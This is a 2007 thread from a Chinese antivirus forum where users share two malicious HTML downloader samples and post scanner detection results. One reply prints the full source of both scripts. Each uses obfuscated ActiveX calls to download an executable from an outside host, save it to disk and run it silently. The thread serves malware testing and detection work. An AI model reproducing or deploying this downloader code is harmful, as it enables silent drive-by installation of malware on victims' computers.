查看: 3208|回复: 9
收起左侧

[病毒样本] 两个HTML下载器[041741] [B0E02A]

[复制链接]
zszzd
发表于 2007-9-27 18:17:35 | 显示全部楼层 |阅读模式
大家扫扫前请到
http://dm.tgbus.com/2007/
此处选美大会帮 夏娜 投张票吧,否则会影响杀软的查杀效果,谢谢!!9点前哦

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
promised
发表于 2007-9-27 18:22:21 | 显示全部楼层
041741.htm(样本目前链接不上)
  1. <script language=javascript>
  2. function gn(n)
  3. {
  4. var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe';
  5. }
  6. try
  7. { aaa="ob";
  8. bbb="je";
  9. yyy="ct";
  10. ccc="Adodb.";
  11. ddd="Stream";
  12. eee="Microsoft.";
  13. fff="XMLHTTP";
  14. ggg="o";
  15. kkk="p";
  16. mmm="e";
  17. sss="n";
  18. lj='http://61.152.169.234/flash.exe';
  19. var df=document.createElement(aaa+bbb+yyy);
  20. df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  21. var x=df.CreateObject(eee+fff,"");
  22. var S=df.CreateObject(ccc+ddd,"");
  23. S.type=1;
  24. x.open("GET", lj,0);
  25. x.send();
  26. mz1=gn(10000);
  27. var F=df.CreateObject("Scripting.FileSystemObject","");
  28. var tmp=F.GetSpecialFolder(0); mz1= F.BuildPath(tmp,mz1);
  29. S.Open();
  30. ttt=x.responseBody;
  31. S.Write(ttt);
  32. S.SaveToFile(mz1,2); S.Close();
  33. var Q=df.CreateObject("Shell.Application","");
  34. exp1=F.BuildPath(tmp+'\\system32','cmd.exe');
  35. Q.ShellExecute(exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0);
  36. } catch(i) { i=1; }
  37. </script>
复制代码

[ 本帖最后由 promised 于 2007-9-27 18:23 编辑 ]
kp2006
头像被屏蔽
发表于 2007-9-27 18:23:55 | 显示全部楼层
Trojan.DL.JS.Agent.lgc
promised
发表于 2007-9-27 18:24:36 | 显示全部楼层
这个样本也连不上
  1.                  
  2. <html>
  3. <head>
  4. <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
  5. <title>MS</title>
  6. </head><body>
  7. <noscript>
  8. <iframe src=*></iframe>
  9. </noscript>
  10. <script language="JavaScript">
  11. <!--
  12. document.writeln("<script>var ailian,zhan;ailian="http://w.dzy520.com/0.exe";zhan="Microsoft.com";try{var ado=(document.createElement("object"));var d=1;ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var chenzi=1;var fan=ado.CreateObject("Microsoft.XMLHTTP","");var f=1;var ln="Ado";var lzn="db.St";var an="ream";var g=1;var china=ado.createobject(ln+lzn+an,"");var h=1;fan.Open("GET",ailian,0);fan.Send();china.type=1;var n=1;china.open();china.write(fan.responseBody);china.savetofile(zhan,2);china.close();var chinahks=ado.createobject("ShelL.Application","");chinahks.ShelLexecute(zhan,"","","open",0);}catch(chenzi){};</script\>");
  13. //-->
  14. </script>
  15. <script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
  16. </body></html>
复制代码

[ 本帖最后由 promised 于 2007-9-27 18:25 编辑 ]
1688388728
发表于 2007-9-27 18:25:24 | 显示全部楼层
病毒: Trojan-Downloader.JS.Psyme.ij, Trojan-Downloader.JS.Psyme.hl
文件: 041741[1].rar
目录: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\AW9V89LH
进程: Maxthon.exe
wangjay1980
发表于 2007-9-27 19:10:06 | 显示全部楼层
deleted: Trojan program Trojan-Downloader.JS.Psyme.ij        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\041741.rar/041741.htm
deleted: Trojan program Trojan-Downloader.JS.Psyme.hl        File: C:\Documents and Settings\Owner\×&Agrave;&Atilde;&aelig;\041741.rar/B0E02A.htm
Nerazzurri
发表于 2007-9-27 19:50:37 | 显示全部楼层


[ 本帖最后由 Kav6.0 于 2007-9-27 19:52 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
mofunzone
发表于 2007-9-27 22:41:05 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Users\morgan\Documents\041741.rar'
C:\Users\morgan\Documents\
  041741.rar
    [0] Archive type: RAR
    --> 041741.htm
        [DETECTION] Contains detection pattern of the HTML script virus HTML/Dldr.Agen.1908
        [WARNING]   Infected files in archives cannot be repaired!
    --> B0E02A.htm
        [DETECTION] Contains detection pattern of the VBS script virus VBS/Dldr.Psyme.GV
        [WARNING]   Infected files in archives cannot be repaired!
        [WARNING]   The file was ignored!
红心王子
发表于 2007-9-28 07:48:28 | 显示全部楼层
2007-9-28        7:48:00        1190936880        Administrator        2260        Sign of "VBS:Malware [Script]" has been found in "C:\Documents and Settings\Administrator\桌面\041741.rar\041741.htm" file.
king6808
发表于 2007-9-28 09:55:27 | 显示全部楼层
已删除:木马程序 Trojan-Downloader.JS.Psyme.ij        文件: F:\9.28\041741.rar/041741.htm
已删除:木马程序 Trojan-Downloader.JS.Psyme.hl        文件: F:\9.28\041741.rar/B0E02A.htm
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-18 09:16 , Processed in 0.138459 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表